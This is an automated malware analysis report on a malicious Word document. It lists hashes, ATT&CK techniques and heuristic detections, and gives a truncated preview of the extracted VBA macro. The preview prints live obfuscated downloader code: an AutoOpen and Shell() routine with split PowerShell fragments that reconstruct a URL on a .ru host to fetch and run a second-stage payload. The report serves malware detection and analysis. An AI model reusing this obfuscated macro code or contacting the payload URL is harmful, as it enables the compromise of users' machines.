Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9bac332861154e75…

MALICIOUS

Office (OLE)

Size: 156.5 KB
Created: 2017-11-28 15:08:00
Authoring application: Microsoft Office Word
First seen: 2017-12-08
MD5: 0ea5bfb146ac2909e35b25dce4443f4e
SHA-1: 61947e2fc91c999a5fe5c67a8558d4dd6a4bb8c2
SHA-256: 9bac332861154e7525507782da958c9b65c491e84481a5ef1969a7250b46160c
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that calls Shell(). The macro is designed to download and execute a second-stage payload from the reconstructed URL 'http://mpexNiD+NiDk2+xk2xNiD+NiDxNiD+NiDk2+xk2po.ru/JCxk2+U8Q5K7MT5hHKnO'. The combination of string obfuscation and a Shell() call on document open indicates malicious intent to compromise the user's system.

Heuristics (7)

  • ClamAV: Doc.Macro.Obfuscation-6387400-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6387400-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 77636 bytes
SHA-256: 844120f47d3e7246f0cca90600aa2ae221439e248f0cfa22378c625ebe5e894b

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VDSRUklOd"
Function wmsFvhNAC()
TwDriPdc = Array(StrReverse("waXhnlqKwl"), StrReverse("ltwIFuwUsC"), StrReverse("vniijjUSkV"), StrReverse("rJzdvTmIhd"), StrReverse("JXXXiojDjW"), StrReverse("OiIAoJwoBH"), StrReverse("RXZaubtVNm"), StrReverse("IonOtYPHAr"))
DNoqvutFjj = Mid("dSXxk2+xk2cexk2+xk2ption.Messxk2+xk2age;}}xk2)-CrEplaCe  xk2PJjx'+'k2,[Char]36 -CrEplaCe  ([Char]76+[Char]109+NiD+NiD[Char]73),[Char]39-CrEplaCe xk2sCyxk2,[Char'+']92) )NiD'+'+NiD Ni'+'D).RePlACNAiC6LP", 4, 191)
LiiWk = Array(StrReverse("dRIcvJjlXh"), StrReverse("uvwkOitMmV"), StrReverse("wnHFODOavC"), StrReverse("RuMdbvwLAA"), StrReverse("EmpHCiGnCO"), StrReverse("OjEChpJCNs"), StrReverse("uJpUPziTJT"), StrReverse("hhMlRLwADk"))
bnkvatqJLN = Array(StrReverse("zQmOGNBzol"), StrReverse("XzHZMlzwcH"), StrReverse("vOqtNartHQ"), StrReverse("tooJJAlLTh"), StrReverse("ZujbPLhNCH"), StrReverse("aTitwiasAj"), StrReverse("WHsYsiJzQL"), StrReverse("AmdvhBhPiC"))
sJmPRXPc = Array(StrReverse("LwzvwcfQwj"), StrReverse("KPAjjwdRPU"), StrReverse("iQsROpwNoL"), StrReverse("HZtupmdnWz"), StrReverse("kNNRIlJtlM"), StrReverse("KismTvFjhG"), StrReverse("dRcnYlVFru"), StrReverse("SqvSjRDbJc"))
qAAbGi = Mid("93Ettp://mpexNiD+NiDk2+xk2xNiD+NiDxNiD+NiDk2+xk2po.ru/JCxk2+U8Q5K7MT5hHKnO", 4, 57)
jPiMUrSD = Array(StrReverse("sirzpaKvNa"), StrReverse("asKmLRCIjj"), StrReverse("CkzqGopiLv"), StrReverse("BKOworQsiR"), StrReverse("YNjpkIcqkP"), StrReverse("wYfzAIjAsB"), StrReverse("kbjSZPdLwT"), StrReverse("BJaRIoAHGw"))
PMioskr = Array(StrReverse("jFccAYjHau"), StrReverse("jzGPTTlZtW"), StrReverse("PDCrtUnZCC"), StrReverse("siWEaYpzmz"), StrReverse("FOfwNVjjzQ"), StrReverse("jdinMcDkjj"), StrReverse("lGEYCCaBov"), StrReverse("dlntRBYFdX"))
szDtqBXFZMl = Array(StrReverse("YHKDTmnojt"), StrReverse("OJTbPwcdwD"), StrReverse("cRYuACMDNX"), StrReverse("dOulCQzKNH"), StrReverse("jJUPWIWdrH"), StrReverse("cvFZlHjQCR"), StrReverse("ZjbLQAPiYw"), StrReverse("ARPoUSwIXs"))
lvPCdcn = Mid("NfCV5nrJA1BMdH6((lGFrXA2ZzQRUYHnFqr6EA", 16, 2)
XlaWpUcE = Array(StrReverse("kHalVOwjrw"), StrReverse("UEPFOwJGuL"), StrReverse("virDmupoWL"), StrReverse("DzGLvdjTCn"), StrReverse("FqJqaZViiS"), StrReverse("sRKScCPXzb"), StrReverse("YHNjuWzEJk"), StrReverse("RqEGFEYBcN"))
iNvML = Array(StrReverse("fjMFvhJUAu"), StrReverse("hhIwiAhJzW"), StrReverse("toEtHKjQFS"), StrReverse("KbsKlqWVQj"), StrReverse("quhdQSJTGT"), StrReverse("knJBwrfSwl"), StrReverse("BsPhkGpwKs"), StrReverse("dMtQfzGado"))
jARPQKC = Array(StrReverse("jfLpifXWzv"), StrReverse("llirkPdbIa"), StrReverse("KbUoQUGAzf"), StrReverse("QKOfYzOfjc"), StrReverse("isNwHiRIvG"), StrReverse("BzjGFIKWYJ"), StrReverse("ZXZUfaWDSm"), StrReverse("BzufrSNWjl"))
KiYRzlihD = Mid("ltT' (NiD .( ucgPshomENiD+NiD[21]+ucgpshOMENiD+NiD[30]NiD+NiDuGfshAvZ", 4, 58)
TRPpXAHtJzi = Array(StrReverse("AMKlhXSqLt"), StrReverse("LEXiiwiAtK"), StrReverse("dLJOpYusWz"), StrReverse("lEpKkohiAN"), StrReverse("owmQjZoOhh"), StrReverse("UGjSKpDwvI"), StrReverse("cZULIGONtt"), StrReverse("QAzjVfYshQ"))
ddNcFXnMPij = Array(StrReverse("DwErdTbHZQ"), StrReverse("mrHXDLStSj"), StrReverse("HOpIEDCDPn"), StrReverse("uopmGaSiqL"), StrReverse("zOdCAJqXcf"), StrReverse("zTDzdpIvmZ"), StrReverse("QXsmVwCUQc"), StrReverse("tkDHhsknIv"))
rAMvMq = Array(StrReverse("aikLOLOjCU"), StrReverse("MUMajZpolN"), StrReverse("njjBbJAUSt"), StrReverse("hQnjzfDLJB"), StrReverse("hDCkwKARCO"), StrReverse("FVWacrwjkE"), StrReverse("LuNJnvhjdE"), StrReverse("WdikfjjwCR"))
OLiNPDjP = Mid("4Y0sZS7bpJ03j2CB02+xk2;PJjnsaxk2+xk2dasd = new-obxk2+xk2jectxk2+xk2 randomx'+'k2+xk2;PJjbcxk2+xk2dxk2+xk2 =xk2+xk2 LmIxk2+xk2hZWcqzbBWr", 18, 109)
YpYhBzwIHG = Array(StrReverse("NfbjnbkpIR"), StrReverse("SWwRvbWrjB"), StrReverse("HVGzmPQwSk"), StrReverse("EVnqMkwJwu"), StrReverse("NMMwKWolLG"), StrReverse("
... (truncated)